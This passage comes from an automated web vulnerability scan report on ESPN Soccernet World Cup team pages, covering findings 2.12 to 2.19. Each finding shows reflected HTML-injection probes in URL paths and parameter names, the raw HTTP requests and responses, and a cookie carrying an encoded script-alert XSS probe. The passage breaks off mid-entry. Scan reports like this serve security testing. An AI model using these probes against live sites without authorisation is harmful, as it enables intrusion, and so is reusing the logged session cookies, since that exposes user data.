Date: Sat, 06 Nov 2010 23:08:57 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:57 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN14
Cache-Expires: Sat, 06 Nov 2010 23:13:57 GMT
Content-Length: 81910
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Chile Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=207&_slug_=chile977b9"><a>d4b442ea0d6&topId=803725&linktext=Brilliant+Brazil+put+three+past+Chile">
...[SNIP]...
|
2.12. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/207/chile |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe29"><a>f1fd16cfb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile?ebe29"><a>f1fd16cfb8e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:29 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN12
Cache-Expires: Sat, 06 Nov 2010 23:12:29 GMT
Content-Length: 82018
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Chile Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=207&ebe29"><a>f1fd16cfb8e=1&_slug_=chile&ebe29">
...[SNIP]...
|
2.13. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/210/paraguay |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d453d"><a>904bfdecc42 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguayd453d"><a>904bfdecc42 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:44 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:31:44 GMT
Content-Length: 82073
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Paraguay Football /
...[SNIP]...
<a href="/worldcup2010/team?team=210&_slug_=paraguayd453d"><a>904bfdecc42&topId=799269&linktext=Gerardo+Martino+to+remain+as+coach">
...[SNIP]...
|
2.14. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/210/paraguay |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e861b"><a>1c6180afac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguay?e861b"><a>1c6180afac1=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:22:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:22:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN12
Cache-Expires: Sat, 06 Nov 2010 23:27:55 GMT
Content-Length: 82181
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Paraguay Football /
...[SNIP]...
<a href="/worldcup2010/team?team=210&e861b"><a>1c6180afac1=1&_slug_=paraguay&e861b">
...[SNIP]...
|
2.15. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/212/uruguay |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 416ae"><a>174e4000843 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/212/uruguay416ae"><a>174e4000843 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:33 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:34:33 GMT
Content-Length: 81983
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Uruguay Football /
...[SNIP]...
<a href="/worldcup2010/team?team=212&_slug_=uruguay416ae"><a>174e4000843&topId=807748&linktext=Germany+finish+in+third+place">
...[SNIP]...
|
2.16. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/212/uruguay |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f178"><a>aa580cad459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/212/uruguay?2f178"><a>aa580cad459=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:48 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Sat, 06 Nov 2010 23:33:48 GMT
Content-Length: 82091
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Uruguay Football /
...[SNIP]...
<a href="/worldcup2010/team?team=212&2f178"><a>aa580cad459=1&_slug_=uruguay&2f178">
...[SNIP]...
|
2.17. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/215/honduras |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd53"><a>9d87ae988a2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras2fd53"><a>9d87ae988a2 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:37 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:14:37 GMT
Content-Length: 81718
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Honduras Football /
...[SNIP]...
<a href="/worldcup2010/team?team=215&_slug_=honduras2fd53"><a>9d87ae988a2&topId=802308&linktext=Coach+happy+after+claiming+point">
...[SNIP]...
|
2.18. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/215/honduras |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 914aa"><a>4f86e09379e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras?914aa"><a>4f86e09379e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:13:25 GMT
Content-Length: 81826
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Honduras Football /
...[SNIP]...
<a href="/worldcup2010/team?team=215&914aa"><a>4f86e09379e=1&_slug_=honduras&914aa">
...[SNIP]...
|
2.19. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/2666/new-zealand |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17070"><a>7043290c14 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand17070"><a>7043290c14 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
